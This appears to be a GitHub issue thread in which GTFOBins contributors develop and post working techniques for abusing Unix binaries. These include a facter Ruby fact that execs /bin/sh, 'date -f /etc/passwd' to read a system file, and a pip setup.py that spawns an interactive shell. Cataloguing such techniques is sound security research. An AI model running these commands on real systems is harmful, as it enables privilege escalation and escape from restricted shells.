New bins about gtfobins.github.io HOT 10 CLOSED

Thanks AlessandroZ, that's a great contribution, I'll work on this next days.

from gtfobins.github.io.

Did you try the facter payload? My version uses a slightly different syntax i.e. uses --external-dir but I get no command execution.

$ cat x2
Facter.add(x) do
  setcode do
    Facter::Core::Execution.execute('/usr/bin/id > /tmp/output')
    Facter::Util::Resolution.exec('/usr/bin/id > /tmp/output')
  end
end
$ facter --external-dir=.
Fact file ./x2 was parsed but returned an empty data set
...
$ cat /tmp/output
cat: /tmp/output: No such file or directory

Since it's Ruby I also tried some generic ruby command execution statement, with no luck so far.

from gtfobins.github.io.

Hi,

No in fact, I haven't tested it before. I do not have custom-dir as well but it should be alse done using the environment variable FACTERLIB. I have just done some test but without success.

I agree, it's weird, in lot of examples, they launch system command.

from gtfobins.github.io.

OK the problem was that directories must be absolute paths.

Also apparently there are two kind of facts:

• custom facts (that uses FACTERLIB) are Ruby files;
• external facts (that uses external-dir) are any shebanged executable file.

The nice thing about the former is that the Ruby code is executed within the main ruby process so with an exec we can replace it with a proper interactive shell.

Here's how:

TF=$(mktemp --tmpdir XXXXXXXXXX.rb)
echo 'exec("/bin/sh")' > $TF
FACTERLIB=/tmp/ facter

I'm going to add the binary.

from gtfobins.github.io.

Awesome, nice work. 👍

from gtfobins.github.io.

I have seen this one too:
date -f /etc/passwd

from gtfobins.github.io.

pip as well using a custom repo:
pip install custom_repo

Like these repos (or another custom one):

• https://github.com/mschwager/0wned
• https://github.com/0x00-0x00/FakePip

from gtfobins.github.io.

Thanks @AlessandroZ, let's see if GitHub can help us keeping track of this:

• chown
• chmod
• date -f /etc/passwd
• pip
• finger TODO: mention this link in the commit

from gtfobins.github.io.

Here's the pip version, it's just execute-interactive, I'm not sure if we should add all the other functions since it's basically Python.

TF=$(mktemp -d)
echo 'import os; os.dup2(0, 1); os.dup2(0, 2); os.execl("/bin/sh", "sh")' > $TF/setup.py
pip install $TF

from gtfobins.github.io.

It's perfect like that. Thanks for your work. 👍

from gtfobins.github.io.